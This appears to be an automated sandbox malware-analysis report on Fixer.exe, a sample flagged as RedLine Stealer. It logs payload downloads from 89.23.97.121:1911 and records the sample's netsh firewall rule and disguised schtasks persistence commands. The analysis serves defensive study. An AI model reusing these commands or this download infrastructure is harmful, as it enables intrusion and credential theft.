                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.707638025 CET6106949991147.185.221.24192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.707715988 CET4999161069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.714013100 CET4999161069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.718861103 CET6106949991147.185.221.24192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:10.320446014 CET4999161069192.168.2.5147.185.221.24

                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.036041975 CET5224353192.168.2.51.1.1.1
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.068810940 CET53522431.1.1.1192.168.2.5

                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.036041975 CET192.168.2.51.1.1.10x33c5Standard query (0)et-seattle.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.068810940 CET1.1.1.1192.168.2.50x33c5No error (0)et-seattle.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                          • 89.23.97.121:1911

                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.54970589.23.97.12119112520C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:10.172950029 CET87OUTGET /6z9uno0baqvej0me.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 89.23.97.121:1911
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:10.945786953 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                          Date: Wed, 08 Jan 2025 10:15:10 GMT
                                                                                                                                                                                                                                          Data Raw: 37 33 30 33 38 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 73 5d 5b 66 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 12 07 00 00 0a 00 00 00 00 00 00 6e 31 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 31 07 00 53 00 00 00 00 40 07 00 c4 06 00 00 00 00 00 00 00 00 00 00 00 1e 07 00 e0 11 00 00 00 60 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: 73038MZ@!L!This program cannot be run in DOS mode.$PELs][fn1 @@ @1S@` H.textt `.rsrc@@@.reloc`@BP1HXD$W4f2WH33"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(.*"(4 [TRUNCATED]
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:12.558784962 CET58OUTGET /FixerNerest.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 89.23.97.121:1911
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:12.809309006 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                          Date: Wed, 08 Jan 2025 10:15:12 GMT
                                                                                                                                                                                                                                          Data Raw: 36 31 34 65 38 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 73 5d 5b 66 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 10 05 00 00 de 00 00 00 00 00 00 0e 2f 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 2e 05 00 4f 00 00 00 00 40 05 00 84 db 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 48 24 00 00 00 20 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: 614e8MZ@!L!This program cannot be run in DOS mode.$PELs][f/ @@ @@.O@H$ H.text `.rsrc@@@.reloc @B.H _W4f2WH33"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"( [TRUNCATED]


                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:05:14:52
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Fixer.exe"
                                                                                                                                                                                                                                          Imagebase:0xfd0000
                                                                                                                                                                                                                                          File size:307'712 bytes
                                                                                                                                                                                                                                          MD5 hash:2ACDA1F917022E9E8081AD69B15330C6
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:05:15:11
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                                                                                                                                                                                                                                          Imagebase:0x1d0000
                                                                                                                                                                                                                                          File size:471'096 bytes
                                                                                                                                                                                                                                          MD5 hash:83AB0FD4D723DF8D361E8AE748A01B21
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:05:15:12
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                                                                                                                                                                                                                                          Imagebase:0x4e0000
                                                                                                                                                                                                                                          File size:398'568 bytes
                                                                                                                                                                                                                                          MD5 hash:68A9294881810BC2CF709D03D710648D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:05:15:30
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                                                                                                                                                                                                                                          Imagebase:0x7ff6597b0000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                          Imagebase:0x7ff6597b0000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                                                                                                                                                                                                                                          Imagebase:0x7ff66a950000
                                                                                                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                          Start time:05:15:34
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Imagebase:0x650000
                                                                                                                                                                                                                                          File size:750'130'408 bytes
                                                                                                                                                                                                                                          MD5 hash:33E16C50B29D01391849E46A442BD547
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:05:15:35
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244
                                                                                                                                                                                                                                          Imagebase:0x7ff796ae0000
                                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:05:16:03
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                          File size:750'130'408 bytes
                                                                                                                                                                                                                                          MD5 hash:33E16C50B29D01391849E46A442BD547
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:05:16:03
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 4284 -s 1360
                                                                                                                                                                                                                                          Imagebase:0x7ff796ae0000
                                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:38
                                                                                                                                                                                                                                            Total number of Limit Nodes:7
                                                                                                                                                                                                                                            execution_graph 16231 194d300 DuplicateHandle 16232 194d396 16231->16232 16233 194d0b8 16234 194d0fe GetCurrentProcess 16233->16234 16236 194d150 GetCurrentThread 16234->16236 16237 194d149 16234->16237 16238 194d186 16236->16238 16239 194d18d GetCurrentProcess 16236->16239 16237->16236 16238->16239 16242 194d1c3 16239->16242 16240 194d1eb GetCurrentThreadId 16241 194d21c 16240->16241 16242->16240 16243 194ad38 16247 194ae30 16243->16247 16252 194ae20 16243->16252 16244 194ad47 16248 194ae41 16247->16248 16249 194ae64 16247->16249 16248->16249 16250 194b068 GetModuleHandleW 16248->16250 16249->16244 16251 194b095 16250->16251 16251->16244 16253 194ae64 16252->16253 16254 194ae41 16252->16254 16253->16244 16254->16253 16255 194b068 GetModuleHandleW 16254->16255 16256 194b095 16255->16256 16256->16244 16257 1944668 16258 1944684 16257->16258 16259 1944696 16258->16259 16261 19447a0 16258->16261 16262 19447c5 16261->16262 16266 19448b0 16262->16266 16270 19448a1 16262->16270 16267 19448d7 16266->16267 16268 19449b4 16267->16268 16274 1944248 16267->16274 16268->16268 16272 19448d7 16270->16272 16271 19449b4 16271->16271 16272->16271 16273 1944248 CreateActCtxA 16272->16273 16273->16271 16275 1945940 CreateActCtxA 16274->16275 16277 1945a03 16275->16277

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 0194D0A8 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 294 194d0a8-194d147 GetCurrentProcess 298 194d150-194d184 GetCurrentThread 294->298 299 194d149-194d14f 294->299 300 194d186-194d18c 298->300 301 194d18d-194d1c1 GetCurrentProcess 298->301 299->298 300->301 303 194d1c3-194d1c9 301->303 304 194d1ca-194d1e5 call 194d289 301->304 303->304 307 194d1eb-194d21a GetCurrentThreadId 304->307 308 194d223-194d285 307->308 309 194d21c-194d222 307->309 309->308
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D136
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0194D173
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D1B0
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0194D209
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                                                                                            • Opcode ID: e5e027a09bb44115f9081b80630452df23b93f96a56da9251429a6eb3d23c26b
                                                                                                                                                                                                                                            • Instruction ID: 2c9eab32ba2c8e954fbfb0e1ac8bde431d534e5b5b340fa711f7166711af3197
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5e027a09bb44115f9081b80630452df23b93f96a56da9251429a6eb3d23c26b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E5155B49003498FDB18DFA9D548BAEBFF5FF48304F208459E909A7260DB389944CF65
                                                                                                                                                                                                                                            Function 0194D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 316 194d0b8-194d147 GetCurrentProcess 320 194d150-194d184 GetCurrentThread 316->320 321 194d149-194d14f 316->321 322 194d186-194d18c 320->322 323 194d18d-194d1c1 GetCurrentProcess 320->323 321->320 322->323 325 194d1c3-194d1c9 323->325 326 194d1ca-194d1e5 call 194d289 323->326 325->326 329 194d1eb-194d21a GetCurrentThreadId 326->329 330 194d223-194d285 329->330 331 194d21c-194d222 329->331 331->330
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D136
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0194D173
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D1B0
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0194D209
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                                                                                            • Opcode ID: e644802513229b9422d02b3fd1831413e01df23eb82d20923ebbf5daedde1d97
                                                                                                                                                                                                                                            • Instruction ID: 2fde4f213d6ec3a4e5392b2bf1732e5213edeaadacf27df94c77a730e905e652
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e644802513229b9422d02b3fd1831413e01df23eb82d20923ebbf5daedde1d97
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F55145B49003098FDB18DFA9D548BAEBFF5FF48304F208419E909A7260CB34A944CF65
                                                                                                                                                                                                                                            Function 0194AE30 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 361 194ae30-194ae3f 362 194ae41-194ae4e call 1949838 361->362 363 194ae6b-194ae6f 361->363 368 194ae64 362->368 369 194ae50 362->369 365 194ae71-194ae7b 363->365 366 194ae83-194aec4 363->366 365->366 372 194aec6-194aece 366->372 373 194aed1-194aedf 366->373 368->363 418 194ae56 call 194b0b8 369->418 419 194ae56 call 194b0c8 369->419 372->373 374 194aee1-194aee6 373->374 375 194af03-194af05 373->375 377 194aef1 374->377 378 194aee8-194aeef call 194a814 374->378 380 194af08-194af0f 375->380 376 194ae5c-194ae5e 376->368 379 194afa0-194afb7 376->379 382 194aef3-194af01 377->382 378->382 394 194afb9-194b018 379->394 383 194af11-194af19 380->383 384 194af1c-194af23 380->384 382->380 383->384 386 194af25-194af2d 384->386 387 194af30-194af39 call 194a824 384->387 386->387 392 194af46-194af4b 387->392 393 194af3b-194af43 387->393 395 194af4d-194af54 392->395 396 194af69-194af76 392->396 393->392 412 194b01a-194b060 394->412 395->396 397 194af56-194af66 call 194a834 call 194a844 395->397 403 194af78-194af96 396->403 404 194af99-194af9f 396->404 397->396 403->404 413 194b062-194b065 412->413 414 194b068-194b093 GetModuleHandleW 412->414 413->414 415 194b095-194b09b 414->415 416 194b09c-194b0b0 414->416 415->416 418->376 419->376
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0194B086
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            • Opcode ID: 85f12a07f5da75be39b4dc81ceb5f1b3e0c044a8c5c054870b01432e5ad8465a
                                                                                                                                                                                                                                            • Instruction ID: 579577e7a77167e6ccd85f225879bd70adb6a54096d10204ebcee739db636486
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f12a07f5da75be39b4dc81ceb5f1b3e0c044a8c5c054870b01432e5ad8465a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 527135B0A00B058FD724DF2AD444B5ABBF5FF88205F00896DD59AC7B50DB75E845CB91
                                                                                                                                                                                                                                            Function 01944248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 420 1944248-1945a01 CreateActCtxA 423 1945a03-1945a09 420->423 424 1945a0a-1945a64 420->424 423->424 431 1945a66-1945a69 424->431 432 1945a73-1945a77 424->432 431->432 433 1945a88 432->433 434 1945a79-1945a85 432->434 436 1945a89 433->436 434->433 436->436
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 019459F1
